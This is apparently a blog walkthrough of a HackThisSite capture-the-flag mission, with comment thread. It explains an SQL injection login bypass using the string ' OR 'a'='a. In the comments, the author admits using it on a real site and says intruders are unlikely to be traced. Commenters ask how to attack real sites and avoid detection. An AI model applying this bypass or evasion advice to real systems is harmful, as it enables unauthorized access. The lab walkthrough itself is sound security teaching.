HTS Realistic 2: MySQL-Inject the Nazi Party
Chicago American Nazi Party: Racist pigs are organizing an ‘anti-immigrant’ rally in Chicago. Help anti-racist activists take over their website!
In Hack This Site, Realistic mission 2, you must sieze control of the evil nazist website. Knowledge of SQL is required.
From: DestroyFascism
Message: I have been informed that you have quite admirable hacking skills. Well, this racist hate group is using their website to organize a mass gathering of ignorant racist bastards. We cannot allow such bigoted aggression to happen. If you can gain access to their administrator page and post messages to their main page, we would be eternally grateful.
When you first reach the target site, you will se a simple layout with a few image links on the bottom. Don’t follow them — they lead to a real nazi site, which is illegal to try to hack. The first step is always to check the source code. You will find the following interesting part:
<a href="update.php">
<font color="#000000">
update
</font>
</a>
It is a hyperlink, hidden with the same colour as the background. This is a very simplistic way to hide the administration page, since a search engine would index it. Follow the link to http://www.hackthissite.org/missions/realistic/2/update.php, and you will find an authentication form.
As always, start by viewing the source of the form. Unfortunately, this time we cannot find anything interesting. That is when we realize that the attack must be done on another level.
We can be pretty sure that there is a PHP script processing the form data, since the form’s action-attribute is update2.php. Using PHP/MySQL is a very common way of managing a list of users. Now, imagine how the SQL query sent to the database by the PHP script would look like:
SELECT * FROM users WHERE username = '$USERNAME' and password = '$PASSWORD'
The SELECT clause determines which part of the row is selected (fetched) from the database, and the asterisk (*) is a wildcard, signifying that every column is fetched. The FROM clause determines the table to fetch data from. It is the WHERE clause that is interesting — it contains the conditions for the row that will be fetched. In this case, the username should be what we entered, and so shall the password. For instance, if we entered “SomeUser” and “SomePass123″, the query would be:
SELECT * FROM users WHERE username = 'SomeUser' and password = 'SomePass123'
This is where the injection part in MySQL-injection comes into play. Ponder that our username contained a single quote (’). It would break the string, and render the query invalid. With this information, it is possible to hi-jack the query completely! Just come up with a username and a password that will bypass the normal conditions in the WHERE-clause. I used the following as both the username and the password:
' OR 'a'='a
The processed query willl be like this:
SELECT * FROM users WHERE username = '‘ OR ‘a’='a‘ and password = ‘‘ OR ‘a’='a‘
Thus, it doesn’t matter if we use the incorrect username/password combination as long as ‘a’ is equal to ‘a’, which it usually is.
Unfortunately, few sites protect themselves against this kind of SQL-injection. I once managed to get myself a report to the police when I used it on a small social networking site.
Använder FireStats
I have heard about this kind of Injecttion before.Its really amazing to see how it happens.I hope all the people know about it and protecting it
Comment by Ashish Mohta — February 7, 2007 @ 3:30 pm
I don’t get it. Can you explain this a little bit better?
Here are the things I don’t get
1.) Where did the “SELECT * FROM users WHERE username = ‘$USERNAME’ and password = ‘$PASSWORD’” come from?
2.) What is MySQL?
3.) And what is the a=a thing?
plz help me!
Comment by weston — February 10, 2007 @ 4:55 am
weston, I’ll take the questions in a different order:
2) MySQL is a database system that is very commonly used with PHP. The filename extension of the files in this HackThisSite mission is “.php”, thus we can assume that the database used is MySQL. There is no way to know this exactly, but in this mission it happens to work anyway. You really have to know basic MySQL in order to finish this level. The SELECT syntax should be enough.
1) The MySQL statement for fetching a row of data is
SELECT. The standard syntax of it isSELECT column FROM table WHERE condition, replacing the bolded parts. The query that you quoted is just a hypothetical query; the column-names and table-name can certainly change. However, this would not affect the SQL injection itself since it is carried out in the conditions. You could try moving the conditions around by yourself and testing that username/password: you will see that it works in almost every case.3)
' OR 'a'='ais a username and password specifically constructed to crash the query. Since it contains an apostrophe, it ends the string in the condition. After this, it inserts theOR-statement, and begins a new comparison: whether'a'is equal to'a'(the last apostrophe is already in the query and thus should not be included). Of course, ‘a’ is equivalient with ‘a’. Thus, every row is fetched from the database, and hopefully the first one has administration-capabilities.Good luck,
Tim.
Comment by Tim — February 10, 2007 @ 10:57 am
weston
Ok, that was cool. the ‘ OR ‘a’='athingmy, i’m not sure what it ment, until i read the last post..
but you’re aim here is to crash the query.
what you type in, ‘ OR ‘a’='a will crash the query and select row a collum a, and give you your that user.
copy paste ‘ OR ‘a’='a into both the user and password for this mission, when you see it works you’ll have a better understanding, like i did.
Comment by Stuie — February 14, 2007 @ 10:32 am
Stuie, almost right. It doesn’t select “row a columnt a”. Rather, it selects every row where ‘a’ = ‘a’. Since ‘a’ is always equal to ‘a’, just like 1=1, every row is selected. Only the first result is used, though, but that doesn’t matter.
Glad you completed this level.
Comment by Tim — February 14, 2007 @ 5:04 pm
‘ OR ‘a’='a is a username AND password at the same time (think about it)
Comment by Grhacker — February 22, 2007 @ 4:57 pm
yo i have done this 100 timez and its not working 4 me please help
Comment by Da'Von — February 25, 2007 @ 6:49 pm
Da’Von, try again. It might work better.
Comment by Tim — February 25, 2007 @ 8:42 pm
‘ OR ‘a’='a
Comment by ' OR 'a'='a — February 28, 2007 @ 6:45 am
Sounds’s good i shall try
Comment by Joe — February 28, 2007 @ 7:48 am
Yo, ive been trying this and it doesnt work, can some1 just tell me the pass and user name in this fashion?
Username:
Password:
Comment by decrypter — March 3, 2007 @ 3:18 pm
decrypter, dont u no that is wat the site said not 2 do
Comment by Da'Von — March 3, 2007 @ 6:19 pm
am i supposed 2 type 1′=1 or ‘1′=1′
Comment by Da'Von — March 3, 2007 @ 6:28 pm
but i dont get the pass or the username
Comment by decrypter — March 3, 2007 @ 7:47 pm
Yea i dont either, check all of the basic webs u’ll c my name there asking for help then i mess wit it and i get sumthin,trust dont ask for the answer,and if u need any help look me up at hts my name is the same
Comment by DaVon — March 4, 2007 @ 12:39 am
“Unfortunately, few sites protect themselves against this kind of SQL-injection. I once managed to get myself a report to the police when I used it on a small social networking site.”
How can you recognize is it possible to get in by “‘ OR ‘a’='a”?
Comment by siriuss19 — March 7, 2007 @ 10:32 pm
siriuss19, just try inputing an apostrophe (’). If it returns a MySQL error, it might work.
Comment by Tim — March 8, 2007 @ 6:25 am
On both, username and password? Can I get traced for using that?
Comment by siriuss19 — March 8, 2007 @ 5:14 pm
siriuss19, yes, although the risk is very small that you are found if you don’t cause any damage since the logs certainly are not actively overlooked.
Comment by Tim — March 8, 2007 @ 7:26 pm
ok i followed the link to the page that said “welcome white brother”
now my question is where we put the “SELECT * FROM users WHERE username = ‘‘ OR ‘a’=’a‘ and password = ‘‘ OR ‘a’=’a‘” ?? please help me.
Comment by aspirin111 — March 27, 2007 @ 11:58 am
I am completely lost where do I put “SELECT * FROM users WHERE username = ‘‘ OR ‘a’=’a‘ and password = ‘‘ OR ‘a’=’a‘” I tried putting it in the Username field but it did nothing
I am completely dumb please help me.
Comment by Ratcat — March 28, 2007 @ 5:43 am
aspirin111 and Ratcat: You shouldn’t insert the SELECT query anywhere. That query is an example of how it might look in the verification script. Use the following as both username and password:
‘ OR ‘a’='a
Note that you should use single apostrophes, not the accents here.
Comment by Tim — March 28, 2007 @ 4:58 pm
putting the note definatly helped since i tryed it with the accents like 20 times
Comment by hakk3d — March 30, 2007 @ 7:15 pm
WHOP NEVER MIND I JUST DID IT AND FINISHED IT THANK YOU SO SO SO MUCH!!!!!!!!!!!!!!!!!!!!!!!!
Comment by aspirin111 — April 12, 2007 @ 4:00 pm
i still dont get it.. i typed this in both the user name and password field but still didnt get in..
‘ OR ‘a’=’a
any help please? thanks.
Comment by snugg — April 15, 2007 @ 4:54 am
I have no Idea I put ‘ OR ‘a’=’a as both the user and pass but I still get this
Invalid username/password. Get the fuck out.
Could somebody either tell me the user and pass I should put in or tell me step by step what to do
Comment by Arrow919 — April 15, 2007 @ 3:58 pm
i figured it out. in tim’s post, he used the ` sign (thats the one beside the number 1 key and above the tab) however you need to use the ‘ key (the one beside enter).
so it is
‘ OR ‘a’='a
and you get through.
Comment by snugg — April 15, 2007 @ 6:25 pm
snugg, that’s correct. I’m sorry, but WordPress (the CMS that I use for blogging) automatically replaces the standard single quotes with more fancy ones.
Comment by Tim — April 15, 2007 @ 7:59 pm
username: ‘
password: ‘ OR ‘a’=’a
Comment by An7hrax — May 11, 2007 @ 4:45 pm
i got that SQL Error: near “a”: syntax error so now what do i do?
Comment by jean — May 11, 2007 @ 11:47 pm
Jean, check to make sure that you use the correct apostrophes. They’re the ones which you can usually make by pressing a key once.
Comment by Tim — May 13, 2007 @ 4:18 pm
Is their a way to get into website filters like st.bernard (http://10.7.0.110/) and override the password without getting tracked
Comment by Anonymous — May 16, 2007 @ 5:19 pm
Anonymous: Probably, but not any that I know of. Besides, it’s probably illegal, and thus you shouldn’t try.
Comment by Tim — May 16, 2007 @ 7:05 pm
how can you get onto a computer without a password because my brother is a school tech guy and he gets on my computer and changes the password so i can not get on. can you tell me how to do it so i do not have to beg him anymore?
Comment by Anonymous — May 17, 2007 @ 4:04 pm
the website ask for username and password which are stored in the web site mysql database. The mission is to get the administrator username and password from the web site .
this is similar to above post.
can you help me how to achieve this.
thanks
Comment by Anonymous — May 19, 2007 @ 10:13 am
the website ask for user name and password which are stored in the web site mysql database. The mission is to get the administrator user name and password from the web site .
this is similar to above post.
can you help me how to achieve this.
thanks
Comment by Anonymous — May 19, 2007 @ 10:14 am
Anonymous: The best solution is to tell your mom to make him stop.
Comment by Tim — May 20, 2007 @ 3:56 pm
I got
Invalid username/password. Get the **** out.
SQL Error: near “a”: syntax error
.
Comment by Ian — May 29, 2007 @ 8:06 pm
Ian, remember to change the apostrophes to “real” apostrophes, like those used for strings in most programming languages. Those in the original post here are a bit too “fancy”.
Comment by Tim — May 30, 2007 @ 6:51 pm
my solution was :do not copy and paste try to type it
it works
Comment by my solution was do not copy and paste try to type it it works — June 4, 2007 @ 6:30 am
my solution was :do not copy and paste try to type it
it works
Comment by gaby — June 4, 2007 @ 6:31 am
this is how you enter it
username:’ OR ‘a’='a
password:’ OR ‘a’='a
type/copy&paste the above in to the relevant boxes and submit
Comment by jigsaw128 — June 5, 2007 @ 12:56 pm
Uhhh… Hypotheticaly speaking, what if we didn’t know it was a link to real website and commenced an attack unawares to the dangers it held in it’s white hands… we got to the server but were blocked because of invalaid username. I then cheated on the mission and came here looking for answers… I found the truth.
Comment by King of the Hearts — June 6, 2007 @ 4:47 am
That was easy, i did it a bit differently then you wrote. I easily found the update.php, then, as a username putted admin and as password “anything’ OR ‘x’='x” it’s similar to your example, hope you’ll do guides for mission 4,5 and etc because i believe it will be harder than this one, that i passed with ease.
Comment by IAmMe — June 14, 2007 @ 10:52 am
It keeps saying:
Invalid username/password. Get the fuck out.
SQL Error: near “a”: syntax error
WTF@!!
Comment by Kalyb — June 16, 2007 @ 2:35 am
Okay I think what I mean to ask is, how do I change to real apostrophes
Comment by Kalyb — June 16, 2007 @ 2:59 am
Kalyb, just write it by yourself instead of copying. It’s the ones usually used in coding, also called single quotes.
Comment by Tim — June 16, 2007 @ 3:04 pm
look, i’m VEEEEEEERY noob and .. sorry for making such a newbie question but, where do i put the SQLInjection fuction?! :x
Comment by Basquie — June 19, 2007 @ 1:35 pm
ouh! i found out where to put that kind of information, but now, it gives me an error ..
SQL Error: near “fireyourboss”: syntax error
what meens that?
Comment by Basquie — June 19, 2007 @ 1:39 pm
Basquie: That’s weird. Are you sure that you substituted the apostrophes with real ones?
Comment by Tim — June 20, 2007 @ 7:04 pm
Tim,
Main question: Why is it that ‘ OR ‘a’ = ‘a works exactly?
Is there a reason that the first a has ” around it whereas the second a only has ‘ before it? i.e. ‘a’ as opposed to ‘a
thanks
Comment by plop — June 25, 2007 @ 6:27 am
Plop: That string interferes with the original MySQL query, altering it. The result is that you are allowed access if the password is correct OR if ‘a’ is equal to ‘a’, which is always true. Read the post carefully for a more thorough explanation.
Comment by Tim — June 26, 2007 @ 12:35 pm
I’ve done this ‘ OR ‘a’='a like a million times, and it never does anything, the same thing happeed to me in the first realistic mission, i put what these things tell you to pput, but they never work.
does anyone know what i am doing wrong?
Comment by kinger — July 14, 2007 @ 7:23 pm
kinger, sure you\’re putting it both as the username and as the password?
Comment by Tim — July 15, 2007 @ 10:05 am
will this work for orkut or hotmail or any other site, sir??
Comment by Interested — July 27, 2007 @ 5:41 pm
Interested: No. This relies on a specific vulnerability. Furthermore, if it did, doing so would be illegal.
Comment by Tim — July 27, 2007 @ 11:29 pm
I keep getting “Fatal error: Call to undefined function sqlite_open() in /var/www/sites/scenestar/rootthisbox.net/subdomains/www/html/missions/realistic/2/update2.php on line 5″
I know Im typing it in right. Maybe the server is messed up right now?
Comment by inzel — July 28, 2007 @ 11:08 am
inzel: It’s probably a HTS problem; wait a while and it should work again.
Comment by Tim — July 30, 2007 @ 1:52 pm
to anyone that gets the SQL error: near “a” :syntax error:
try putting the injection in the password field instead of username field, that worked for me
Comment by gycogeco — August 1, 2007 @ 2:22 pm
If you actually have half a brain they wrote the answer 1000x times. And he also explianed that a character is changed automaticly by his blog. Read all the comments and you have your answer.
Comment by cel0x — August 16, 2007 @ 9:21 am
how do we NOT get traced using mysql injection? is it possible?
Comment by wonderin — August 21, 2007 @ 10:44 am
here is what you do you you put
' OR 'a'='a
as both user name and password then hit update
Comment by Ryanb58 — August 26, 2007 @ 2:45 pm
worked on HTS but i vent on and tryed ‘ OR ‘a’='a on a dozen of other pages didnt work i’m pissed :(
Comment by G-MAN — August 29, 2007 @ 6:54 pm
how do i inject them?
Comment by daniel — September 23, 2007 @ 10:24 am
so simple my friend . . .
‘ OR ‘a’='a
both to username and password okey?
help me hack this site
http://www.msumain.edu.ph
come on@
Comment by mastershield — September 28, 2007 @ 5:53 am
for the user name and password slots just enter:
‘ OR ‘a’='a
and it will work
Comment by Anonymous — October 19, 2007 @ 4:13 am
it keeps saying
Invalid username/password. Get the fuck out.
SQL Error: near “a”: syntax error
.
Comment by ginger — October 19, 2007 @ 5:17 pm
Yep true, it’s not with ‘ OR ‘a’=’a anymore. stop spoiling that web plz.
Comment by Azs — November 8, 2007 @ 4:44 pm
so u have to write
username= ‘OR ‘a’='a
password ‘OR’a'=’a
so at username u leave a blank space between ‘ and OR and ‘
but in the password u write it without any space between it
Comment by noro — November 13, 2007 @ 6:47 pm
I know sql and I wrote the code out i even tried the like clause
i get this error
Invalid username/password. Get the **** out.
SQL Error:
.
these is my codes
Select * from users where username = ‘a’ OR ‘ ‘ and password = ‘a’ or ”
Select * from users where username like ‘a%’ or username like ‘adm%’ and password like ‘ ‘
Comment by wayko — January 16, 2008 @ 5:28 pm
I have a question.. How do i hack if the password is encrypted and the query look like this.. $query = “SELECT * FROM users WHERE users = ‘” . $_POST['username'] . “‘ AND Password = PASSWORD (’” . $_POST['password'] . “‘)”; // Jas
Comment by Jas — February 4, 2008 @ 3:07 pm
Computer Data Backups: Test Now or Cry Later…
If you’re like most small business owners, your computer data backups are one of those things that you rarely pay attention to. Computer data backups are kind of like flossing your teeth and eating low-fat, high-fiber foods… everyone knows what they…
Trackback by Data Held In A Computer — February 23, 2008 @ 3:26 pm
this took me a while to find out but after you try a password and it fails, u need to refresh the page… then copy the line from post 62
Comment by Razedd — March 9, 2008 @ 1:59 pm
So say that I’m using TOR with all the additional safety checks done.
I am trying to find a single site out there that has this vulnerability. I have yet to find one..
Any hints as to what to look for to find such a site?
I am a server admin and have made PHP sites and I havn’t had to do a thing to prevent this vulnerability and yet it doesn’t work on my sites.
I’m mainly just curious as to what it looks like when it works, and I want to know more about it so I can further protect my sites if i need to.
Cheers,
Comment by GregTRONlives — March 18, 2008 @ 11:59 pm
so if its that easy how the hell do u do the realistic 4 with the fisherman
plz…email me tnxs
Comment by Y — March 28, 2008 @ 11:41 pm
in the password and name field how would u work this following piece of code out Login
Comment by barson666 — March 29, 2008 @ 10:35 pm
“Login
” how would u work out this code??
Comment by barson666 — March 29, 2008 @ 10:38 pm
a href=”/top/edit.php?name=$(name)&pass=$(pass)&action=panel”>Login
Comment by barson666 — March 29, 2008 @ 10:40 pm
Xanax….
Xanax dosage. Xanax online without prescription. Xanax. Xanax with klonopin. Xanax 2mg….
Trackback by Xanax effect. — April 17, 2008 @ 7:17 pm
i keep getting
Invalid username/password. Get the fuck out.
SQL Error:
.
Comment by fecility — April 19, 2008 @ 8:18 pm
alert (’s’)
Comment by alert ('s') — April 21, 2008 @ 6:27 pm
FOLLOW THIS
REFRESH YOUR PAGE
THEN COPY FROM POST 62
PASTE BOTH AT USERNAME AND PASSWORD
VOILA
if u want any help, mail sinister1228@yahoo.com
Comment by nazee1228 — May 3, 2008 @ 12:15 pm
all i get is this:
Invalid username/password. Get the fuck out.SQL Error: .
where do i go from here??? did i mess up or did i miss a step along the way???
Comment by lamb199 — June 30, 2008 @ 10:28 pm
I clicked the link to the site :D But did not hack :(
Comment by Ronan — July 19, 2008 @ 1:04 pm